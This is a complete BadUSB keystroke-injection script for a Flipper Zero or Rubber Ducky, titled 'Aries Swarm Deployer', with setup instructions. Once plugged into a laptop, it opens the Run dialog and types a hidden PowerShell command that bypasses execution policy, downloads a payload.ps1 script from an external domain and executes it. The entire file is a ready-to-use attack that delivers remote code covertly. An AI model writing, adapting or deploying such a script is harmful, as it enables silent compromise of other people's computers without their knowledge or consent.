REM ============================================================================
REM Aries Swarm Deployer — Flipper Zero BadUSB / Rubber Ducky
REM Copy this file to: SD Card/badusb/aries-swarm.txt
REM Then: Bad USB → aries-swarm → plug into laptop → Run
REM ============================================================================
ID 1234:5678 Aries Deployer

DELAY 2000
GUI r
DELAY 600
STRING powershell -w hidden -ep bypass -c "irm https://gateway.doomtrader.com/api/usb-swarm/payload.ps1|iex"
DELAY 200
ENTER
